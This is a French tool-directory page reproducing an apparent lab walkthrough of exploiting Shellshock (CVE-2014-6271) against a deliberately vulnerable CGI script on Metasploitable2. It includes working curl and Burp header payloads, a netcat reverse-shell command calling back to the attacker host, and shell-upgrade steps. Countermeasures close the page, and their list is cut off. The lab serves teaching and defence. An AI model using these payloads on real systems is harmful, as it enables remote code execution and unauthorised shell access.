Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2014-6271-Shellshock- — Un laboratoire de démonstration moderne et complet pour CVE-2014-6271 (Shellshock), comprenant l'architecture, les étapes d'exploitation, l'utilisation de Burp Suite, les shells inversés, les contre-mesures et une antisèche complète de commandes. | Kitploit
Outils/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
Analyse des VulnérabilitésExploitationRétro-ingénierieExploitation d'Applications WebCTFTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed Teaming
Développement de Charges Utiles
Labs et Pratique
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

Un laboratoire de démonstration moderne et complet pour CVE-2014-6271 (Shellshock), comprenant l'architecture, les étapes d'exploitation, l'utilisation de Burp Suite, les shells inversés, les contre-mesures et une antisèche complète de commandes.

Voir le dépôt
10il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploitation de Shellshock (CVE-2014-6271) : Un laboratoire de démonstration moderne et complet

Shellshock (CVE-2014-6271) est l'une des vulnérabilités d'exécution de code à distance les plus influentes jamais découvertes. Cette faille affecte Bash et permet aux attaquants d'exécuter des commandes arbitraires en injectant simplement des payloads conçus dans des variables d'environnement.

Ce guide fournit une démonstration complète et reproductible utilisant :

  • Kali Linux (attaquant)
  • Metasploitable2 (cible)
  • curl, Burp Suite, Netcat
  • Un script CGI Bash créé manuellement

Il est conçu pour l'enseignement, la recherche, la formation et la sensibilisation générale à la cybersécurité.


📌 Table des matières

  1. Lab Architecture
  2. Creating the Vulnerable CGI Script
  3. Understanding the Shellshock Vulnerability
  4. Exploiting Shellshock with curl
  5. Exploiting Shellshock with Burp Suite
  6. Reverse Shell via Shellshock
  7. Upgrading to a Fully Interactive TTY
  8. Attack Chain Diagram
  9. Screenshot Gallery
  10. Countermeasures
  11. Cheat Sheet (All Commands)
  12. Exploiting Shellshock Using Metasploit
  13. Conclusion

1. Architecture du laboratoire

ComposantRôleOSAdresse IPServices clés
Kali LinuxAttaquantKali Linux (latest)192.168.1.4curl, Burp Suite, Netcat
Metasploitable2Serveur cible vulnérableUbuntu Linux (MSF2)192.168.1.5Apache 2.2, CGI scripts, Bash
Apache mod_cgiExécution de scriptsS'exécute sur MSF2n/aExpose Bash via CGI
shellshock.shPoint d'entrée vulnérableBash CGIn/aAffiche les variables d'environnement

Cette configuration simple à deux nœuds reflète de nombreux déploiements hérités encore présents dans les systèmes industriels et IoT.


2. Création du script CGI vulnérable

Sur Metasploitable2 :

sudo su
cd /usr/lib/cgi-bin/

cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF

chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

Testez le script depuis Kali :

curl http://192.168.1.5/cgi-bin/shellshock.sh

Vous devriez voir les variables d'environnement affichées.


3. Compréhension de la vulnérabilité Shellshock

Shellshock se produit lorsque Bash analyse incorrectement des variables d'environnement qui ressemblent à des définitions de fonctions.

Une variable malveillante telle que :

() { :; }; /bin/bash -c "id"

amènera Bash à exécuter la commande après la définition de la fonction — même si la fonction elle-même n'est jamais invoquée.

Les applications CGI sont particulièrement vulnérables car les en-têtes HTTP sont automatiquement transmis aux scripts en tant que variables d'environnement.


4. Exploitation de Shellshock avec curl

curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

La sortie devrait inclure :

Vulnerable
uid=33(www-data)

Cela confirme l'exécution de code à distance.


5. Exploitation de Shellshock avec Burp Suite

5.1 Envoi d'une requête normale

Visitez :

http://192.168.1.5/cgi-bin/shellshock.sh

Envoyez la requête au Repeater.

5.2 Injection du payload Shellshock

Remplacez l'en-tête User-Agent par :

User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"

5.3 Réponse

Vous devriez voir :

BurpTest
uid=33(www-data)

Burp Suite confirme la vulnérabilité de manière visuelle et éducative.


6. Shell inversé via Shellshock

Démarrez le listener sur Kali :

nc -lvnp 4444

Déclenchez le shell inversé via le script CGI :

curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Un shell se connectera en retour à Kali.


7. Mise à niveau vers un TTY entièrement interactif

À l'intérieur du shell inversé :

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Suspendre la session :

Ctrl + Z

Sur Kali :

stty raw -echo; fg

Appuyez sur Entrée.

Vous avez désormais :

  • complétion par tabulation
  • touches fléchées
  • contrôle de tâches
  • Bash interactif complet

8. Schéma de la chaîne d'attaque

          ┌────────────────────────┐
          │     Attacker (Kali)    │
          │      192.168.1.4       │
          └───────────┬────────────┘
                      │
     1. Malicious HTTP Header (Shellshock)
                      │
                      ▼
        ┌──────────────────────────┐
        │ Apache Web Server (CGI)  │
        │     192.168.1.5          │
        └───────────┬──────────────┘
                    │
   2. Header → CGI Environment Variable
                    │
                    ▼
      ┌──────────────────────────┐
      │     Bash (Vulnerable)    │
      └───────────┬──────────────┘
                  │
      3. Injected Command Executes
                  │
                  ▼
        ┌─────────────────────────┐
        │  www-data Shell Access  │
        └───────────┬─────────────┘
                    │
        4. Reverse Shell → Kali
                    │
                    ▼
      ┌──────────────────────────┐
      │ Full Interactive TTY     │
      └──────────────────────────┘

9. Galerie de captures d'écran

Une visite visuelle des étapes clés de l'attaque.

DescriptionImage
Scan Nmap + sortie du test Shellshock
Burp Suite – Requête Shellshock initiale
Burp Suite – Injection du payload / en-tête
Shell inversé reçu sur Kali (nc)

10. Contre-mesures

✔ 1. Mise à jour de Bash

Mettez à jour vers une version qui gère correctement l'analyse des fonctions.

✔ 2. Désactiver CGI

Le CGI hérité introduit un risque systémique inutile.

✔ 3. Nettoyer les en-têtes HTTP

Supprimez les motifs suspects tels que :

() { :; };

✔ 4. Utiliser le moindre privilège

Restreignez les permissions de l'utilisateur du serveur web (www-data).

✔ 5. Restrictions des connexions sortantes

Empêche les shells inversés et l'exfiltration de données.

✔ 6. Déployer un pare-feu d'application web (WAF)

Les signatures WAF modernes détectent Shellshock immédiatement.

✔ 7. Activer SELinux / AppArmor

Télécharger l’outil